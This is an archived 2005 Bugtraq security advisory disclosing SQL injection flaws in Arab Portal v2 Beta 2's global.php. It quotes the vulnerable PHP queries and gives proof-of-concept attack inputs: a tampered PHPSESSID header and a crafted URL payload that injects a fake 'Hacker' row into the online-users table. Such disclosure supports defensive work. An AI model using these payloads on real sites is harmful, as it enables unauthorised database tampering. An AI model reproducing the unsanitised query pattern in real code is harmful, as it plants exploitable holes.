Arab Portal v2 Beta2 SQL Injections

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Arab Portal v2 Beta2 SQL Injections
From: stranger-killer@xxxxxxxxxxx
Date: 11 Dec 2005 15:24:49 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Hi .. This is small bug for Arab Portal System v2 Beta 2

File name :- global.php
Remote:- Yes
Credit :- 

Devil-00 

Messenger :- <devil-00@xxxxxx>
E-Mail :- <stranger-killer@xxxxxxxxxxx>

//--# Devil SQL Injection
/*
This SQL can do when :-
magic_quotes_gpc = Off 
$session_id << Bad Var

Attacking :-
http://127.0.0.1/Arab_Portal_v.2.0_beta_2/link.php?action=list&cat_id=5

Edit HTTPHeader [ PHPSESSID ] = SQL Injection
*/
$apt->query("DELETE FROM rafia_online WHERE onlineSID ='$session_id' or 
timestamp < $timeout");
#--//

//--# Devil SQL Injection
/*
Devil-00 .. devil-00@xxxxxx
This SQL can do when :-
magic_quotes_gpc = Off 

$REQUEST_URI    << Bad Var
$session_id             << Bad Var

Attacking URL :-
http://127.0.0.1/Arab_Portal_v.2.0_beta_2/link.php?action=list&cat_id=5&;','010','Hacker','0')/*

SQL Well Be

INSERT INTO rafia_online (timestamp,onlineip,
 onlinefile,onlinepage,onlineSID,user_online,useronlineid) VALUES 
('1134309930','127.0.0.1','/Arab_Portal_v.2.0_beta_2/link.php',
'/Arab_Portal_v.2.0_beta_2/link.php?action=list&cat_id=5','0202020','Hacker','0')/*','6038e5a71794874f0130af05ec05501b','Guest','0')

Onlines :-
        Guest   &#1610;&#1578;&#1608;&#1575;&#1580;&#1583; &#1601;&#1610;       
---
        Hacker  &#1610;&#1578;&#1608;&#1575;&#1580;&#1583; &#1601;&#1610;       
---
*/
$apt->query("INSERT INTO rafia_online (timestamp,
                                          onlineip,
                                          onlinefile,
                                          onlinepage,
                                          onlineSID,
                                          user_online,
                                          useronlineid)
                                  VALUES ('$timestamp',
                                          '$online_ip',
                                          '$PHP_SELF',
                                          '$REQUEST_URI', 
                                          '$session_id',
                                          '$useronline',
                                          '$useronlineid')");
#--//

Prev by Date: Re: Website Baker <=2.6.0 SQL Injection -> Login bypass -> remote code execution
Next by Date: [PHP-CHECKER] 99 potential SQL injection vulnerabilities
Previous by thread: SEC Consult SA-20051211-0 :: Nortel SSL VPN Cross Site Scripting/Command Execution
Next by thread: [PHP-CHECKER] 99 potential SQL injection vulnerabilities
Index(es):
- Date
- Thread